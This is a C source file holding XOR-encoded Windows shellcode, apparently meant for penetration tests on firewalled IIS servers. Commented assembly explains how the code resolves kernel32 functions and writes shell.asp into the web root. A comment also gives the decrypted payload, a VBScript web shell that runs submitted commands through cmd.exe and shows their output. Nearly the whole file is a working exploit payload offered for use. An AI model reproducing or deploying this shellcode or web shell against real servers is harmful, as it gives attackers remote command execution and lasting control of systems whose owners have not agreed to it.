// shellcode that creates shell.asp, a cmdasp.asp alike page
// handy for penetration tests where a vulnerable IIS server is
// heavily firewalled
//                                           <michael@scanit.be>

#include <windows.h>

int main(void){

	char shellcode[] = 

		"\xEB\x03\x5E\xEB\x05\xE8\xF8\xFF\xFF\xFF\x81\xEE\x10\xFC\xFF\xFF"
		"\x33\xC9\x66\xB9\x53\x03\x80\x36\x99\x4E\xE2\xFA\x8B\xFE\x83\xEF\x10\x56\xBB"

		// loadlib	0x42413cff
		"\xFF\x3C\x41\x42"

		"\xC1\xEB\x08\xFF\xD3\x89\x07\x83\xC6\x09\x56\x57\xBB"

		// getproc	0x424194ff
		"\xFF\x94\x41\x42"

		"\xC1\xEB\x08\xFF\xD3\x89\x47\x04"
		"\x83\xC6\x0C\x56\x57\xFF\xD3\x89\x47\x08\x83\xC6\x05\x83\xC6\x05"
		"\x56\x57\xFF\xD3\x89\x84\x2F\xF4\xFF\xFF\xFF\x83\xC6\x0C\x33\xC9"
		"\x51\xB1\x80\x51\x6A\x02\x33\xC9\x51\x51\xB9\xBF\xDD\xA5\xBE"
		"\x81\xF1\xBE\xBA\xDE\xC0\x51\x56\xFF\x94\x2F\xF4\xFF\xFF\xFF"
		"\x8B\xD0\x33\xC9\x51\x8D\x5E\xE8\x53\x66\xB9\x02\x03\x51\x83\xC6\x32"
		"\x56\x52\xFF\x57\x08\x52\xFF\x57\x04"
		"\xc0\xde\xba\xbe\xc0\xde\xba\xbe\xc0\xde\xba\xbe\xc0\xde\xba\xbe"
		"\xF2\xFC\xEB\xF7\xFC\xF5\xAA\xAB\x99"		
		"\xDA\xF5\xF6\xEA\xFC\xD1\xF8\xF7\xFD\xF5\xFC\x99\xCE\xEB\xF0\xED\xFC\xDF"
		"\xF0\xF5\xFC\x99\xDA\xEB\xFC\xF8\xED\xFC\xDF\xF0\xF5\xFC\xD8\x99\xFA\xA3"
		"\xC5\xC5\xC5\xC5\xF0\xF7\xFC\xED\xE9\xEC\xFB\xC5\xC5\xC5\xC5\xEE\xEE\xEE"
		"\xEB\xF6\xF6\xED\xC5\xC5\xC5\xC5\xEA\xF1\xFC\xF5\xF5\xB7\xF8\xEA\xE9\x99"							
		"\xA5\xBC\xD9\xB9\xD5\xF8\xF7\xFE\xEC\xF8\xFE\xFC\xA4\xCF\xDB\xCA\xFA\xEB"
		"\xF0\xE9\xED\xB9\xBC\xA7\x94\x93\xA5\xBC\x94\x93\xDD\xF0\xF4\xB9\xF6\xEA"
		"\xB5\xB9\xF6\xF7\xB5\xB9\xF6\xFF\xB5\xB9\xFF\xF0\xB5\xB9\xFA\xF4\xB5\xB9"
		"\xEA\xED\x94\x93\xD6\xF7\xB9\xDC\xEB\xEB\xF6\xEB\xB9\xCB\xFC\xEA\xEC\xF4"
		"\xFC\xB9\xD7\xFC\xE1\xED\x94\x93\xCA\xFC\xED\xB9\xF6\xEA\xB9\xA4\xB9\xCA"
		"\xFC\xEB\xEF\xFC\xEB\xB7\xDA\xEB\xFC\xF8\xED\xFC\xD6\xFB\xF3\xFC\xFA\xED"
		"\xB1\xBB\xCE\xCA\xDA\xCB\xD0\xC9\xCD\xB7\xCA\xD1\xDC\xD5\xD5\xBB\xB0\x94"
		"\x93\xCA\xFC\xED\xB9\xF6\xF7\xB9\xA4\xB9\xCA\xFC\xEB\xEF\xFC\xEB\xB7\xDA"
		"\xEB\xFC\xF8\xED\xFC\xD6\xFB\xF3\xFC\xFA\xED\xB1\xBB\xCE\xCA\xDA\xCB\xD0"
		"\xC9\xCD\xB7\xD7\xDC\xCD\xCE\xD6\xCB\xD2\xBB\xB0\x94\x93\xCA\xFC\xED\xB9"
		"\xF6\xFF\xB9\xA4\xB9\xCA\xFC\xEB\xEF\xFC\xEB\xB7\xDA\xEB\xFC\xF8\xED\xFC"
		"\xD6\xFB\xF3\xFC\xFA\xED\xB1\xBB\xCA\xFA\xEB\xF0\xE9\xED\xF0\xF7\xFE\xB7"
		"\xDF\xF0\xF5\xFC\xCA\xE0\xEA\xED\xFC\xF4\xD6\xFB\xF3\xFC\xFA\xED\xBB\xB0"
		"\x94\x93\xFA\xF4\xB9\xA4\xB9\xCB\xFC\xE8\xEC\xFC\xEA\xED\xB7\xDF\xF6\xEB"
		"\xF4\xB1\xBB\xB7\xDA\xD4\xDD\xBB\xB0\x94\x93\xD0\xFF\xB9\xB1\xFA\xF4\xB9"
		"\xA5\xA7\xB9\xBB\xBB\xB0\xB9\xCD\xF1\xFC\xF7\x94\x93\xEA\xED\xB9\xA4\xB9"
		"\xBB\xDA\xA3\xC5\xBB\xB9\xBF\xB9\xF6\xFF\xB7\xDE\xFC\xED\xCD\xFC\xF4\xE9"
		"\xD7\xF8\xF4\xFC\xB1\xB9\xB0\x94\x93\xDA\xF8\xF5\xF5\xB9\xF6\xEA\xB7\xCB"
		"\xEC\xF7\xB9\xB1\xBB\xFA\xF4\xFD\xB7\xFC\xE1\xFC\xB9\xB6\xFA\xB9\xBB\xB9"
		"\xBF\xB9\xFA\xF4\xB9\xBF\xB9\xBB\xB9\xA7\xB9\xBB\xB9\xBF\xB9\xEA\xED\xB5"
		"\xB9\xA9\xB5\xB9\xCD\xEB\xEC\xFC\xB0\x94\x93\xCA\xFC\xED\xB9\xFF\xF0\xB9"
		"\xA4\xB9\xF6\xFF\xB7\xD6\xE9\xFC\xF7\xCD\xFC\xE1\xED\xDF\xF0\xF5\xFC\xB9"
		"\xB1\xEA\xED\xB5\xB9\xA8\xB5\xB9\xDF\xF8\xF5\xEA\xFC\xB5\xB9\xA9\xB0\x94"
		"\x93\xDC\xF7\xFD\xB9\xD0\xFF\x94\x93\xBC\xA7\x94\x93\xA5\xD1\xCD\xD4\xD5"
		"\xA7\xA5\xDB\xD6\xDD\xC0\xA7\xA5\xDF\xD6\xCB\xD4\xB9\xF8\xFA\xED\xF0\xF6"
		"\xF7\xA4\xBB\xA5\xBC\xA4\xB9\xCB\xFC\xE8\xEC\xFC\xEA\xED\xB7\xCA\xFC\xEB"
		"\xEF\xFC\xEB\xCF\xF8\xEB\xF0\xF8\xFB\xF5\xFC\xEA\xB1\xBB\xCC\xCB\xD5\xBB"
		"\xB0\xB9\xBC\xA7\xBB\xB9\xF4\xFC\xED\xF1\xF6\xFD\xA4\xBB\xC9\xD6\xCA\xCD"
		"\xBB\xA7\xA5\xF0\xF7\xE9\xEC\xED\xB9\xED\xE0\xE9\xFC\xA4\xED\xFC\xE1\xED"
		"\xB9\xF7\xF8\xF4\xFC\xA4\xBB\xB7\xDA\xD4\xDD\xBB\xB9\xEA\xF0\xE3\xFC\xA4"
		"\xAD\xAC\xB9\xEF\xF8\xF5\xEC\xFC\xA4\xBB\xA5\xBC\xA4\xB9\xFA\xF4\xB9\xBC"
		"\xA7\xBB\xA7\xA5\xF0\xF7\xE9\xEC\xED\xB9\xED\xE0\xE9\xFC\xA4\xEA\xEC\xFB"
		"\xF4\xF0\xED\xB9\xEF\xF8\xF5\xEC\xFC\xA4\xBB\xCB\xEC\xF7\xBB\xA7\xA5\xB6"
		"\xDF\xD6\xCB\xD4\xA7\xA5\xC9\xCB\xDC\xA7\x94\x93\xA5\xBC\x94\x93\xD0\xFF"
		"\xB9\xB1\xD0\xEA\xD6\xFB\xF3\xFC\xFA\xED\xB1\xFF\xF0\xB0\xB0\xB9\xCD\xF1"
		"\xFC\xF7\x94\x93\xD6\xF7\xB9\xDC\xEB\xEB\xF6\xEB\xB9\xCB\xFC\xEA\xEC\xF4"
		"\xFC\xB9\xD7\xFC\xE1\xED\x94\x93\xCB\xFC\xEA\xE9\xF6\xF7\xEA\xFC\xB7\xCE"
		"\xEB\xF0\xED\xFC\xB9\xCA\xFC\xEB\xEF\xFC\xEB\xB7\xD1\xCD\xD4\xD5\xDC\xF7"
		"\xFA\xF6\xFD\xFC\xB1\xFF\xF0\xB7\xCB\xFC\xF8\xFD\xD8\xF5\xF5\xB0\x94\x93"
		"\xFF\xF0\xB7\xDA\xF5\xF6\xEA\xFC\x94\x93\xDA\xF8\xF5\xF5\xB9\xF6\xFF\xB7"
		"\xDD\xFC\xF5\xFC\xED\xFC\xDF\xF0\xF5\xFC\xB1\xEA\xED\xB5\xB9\xCD\xEB\xEC"
		"\xFC\xB0\x94\x93\xDC\xF7\xFD\xB9\xD0\xFF\x94\x93\xBC\xA7\x94\x93\xA5\xB6"
		"\xDB\xD6\xDD\xC0\xA7\xA5\xB6\xD1\xCD\xD4\xD5\xA7\x99\x99";

/*		jmp floep
terug:  pop esi
		jmp verder
floep:  call terug
verder: sub esi, 0xfffffffc10	// ofzo
		inc esi
		xor ecx,ecx
		mov cx, 0x353	// 0x353 = asp code, filename + func's + lib
decr:	xor byte ptr [esi], 0x99
		dec esi
		loop decr
  // data is decrypted now, esi at beginning of "kernel32\0"
		mov edi, esi
		sub edi, 0x10
  // edi now at beginning of filename
		push esi			// kernel32
		mov ebx, LOADLIB
		shr ebx, 0x8
		call ebx
		mov dword ptr[edi], eax	// store add of kernel32  (@AAAA)
		add esi, 0x9
		push esi
		push edi
		mov ebx, GETPROC
		shr ebx, 0x8
		call ebx
		mov dword ptr [edi+4], eax	// CloseHandle (BBBB)
		add esi, 0xc
		push esi
		push edi
		call ebx
		mov dword ptr [edi+8], eax	// WriteFile (CCCC)
		add esi, 0x5
		add esi, 0x5				// 0xa = "\n" might fuck up things
		push esi
		push edi
		call ebx
		mov dword ptr [edi+c], eax	// CreateFile (DDDD)
		add esi, 0xc	// beginning of filename

  // hFile =CreateFile("c:\\inetpub\\wwwroot\\shell.asp",FILE_ALL_ACCESS,NULL,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,NULL);

		xor ecx,ecx
		push ecx
		mov cl, 0x80
		push ecx
		push 0x2
		xor ecx,ecx
		push ecx
		push ecx	
		mov ecx, 0xbea5ddbf
		xor ecx, 0xc0debabe	// ;)
		push ecx				// FILE_ALL_ACCESS = 0x1F03FF
		push esi				// filename
		call dword ptr [edi+c]

	// WriteFile(hFile, buf, 770, &tmp, NULL);

  		mov edx, eax
		xor ecx, ecx
		push ecx
		lea  ebx, [esi-24]	// "kern" from kernel32\0
		push ebx
		mov cx, 0x302
		push ecx
		add esi, 0x32		// point to encrypted asp code
		push esi
		push edx
		call dword ptr [edi+8]

	// CloseHandle(hFile);

		push edx
		call dword ptr [edi+4]

	}

// encrypted payload (xorred 0x99) : 

//"AAAABBBBCCCCDDDD"
//"kernel32\x00"
//"CloseHandle\x00"
//"WriteFile\x00"
//"CreateFileA\x00"
//"c:\\\\inetpub\\\\wwwroot\\\\shell.asp\x00"
"<%@ Language=VBScript %>\r\n"
"<%\r\n"
"Dim os, on, of, fi, cm, st\r\n"
"On Error Resume Next\r\n"
"Set os = Server.CreateObject(\"WSCRIPT.SHELL\")\r\n"
"Set on = Server.CreateObject(\"WSCRIPT.NETWORK\")\r\n"
"Set of = Server.CreateObject(\"Scripting.FileSystemObject\")\r\n"
"cm = Request.Form(\".CMD\")\r\n"
"If (cm <> \"\") Then\r\n"
"st = \"C:\\\" & of.GetTempName( )\r\n"
"Call os.Run (\"cmd.exe /c \" & cm & \" > \" & st, 0, True)\r\n"
"Set fi = of.OpenTextFile (st, 1, False, 0)\r\n"
"End If\r\n"
"%>\r\n"
"<HTML><BODY><FORM action=\"<%= Request.ServerVariables(\"URL\") %>\" method=\"POST\"><input type=text name=\".CMD\" size=45 value=\"<%= cm %>\"><input type=submit value=\"Run\"></FORM><PRE>\r\n"
"<%\r\n"		
"If (IsObject(fi)) Then\r\n"
"On Error Resume Next\r\n"
"Response.Write Server.HTMLEncode(fi.ReadAll)\r\n"
"fi.Close\r\n"
"Call of.DeleteFile(st, True)\r\n"
"End If\r\n"
"%>\r\n"
"</BODY></HTML>\x00";
*/

}